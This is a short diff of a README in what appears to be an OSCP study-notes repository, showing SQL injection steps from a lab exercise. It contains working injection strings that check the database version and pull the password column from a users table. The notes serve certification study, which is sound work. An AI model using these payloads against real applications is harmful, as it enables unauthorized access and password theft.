Chw41/OffSec-Certification/Offensive Security Certified Professional/Self Note/README.md

     ![image](https://hackmd.io/_uploads/Bknx844Xkl.png)
     > received an Authentication Successful message, meaning that our attack succeeded

-2. Check version
+2. Check DB version
     ```
     ' or 1=1 in (select @@version) -- //
     ```
     ![image](https://hackmd.io/_uploads/ryxGc4VQkg.png)
     > This means that we should **only query one column at a time**.

-3. Grab only the password column.
+3. Grab only the password column
     ```
     ' or 1=1 in (SELECT password FROM users) -- //
     ```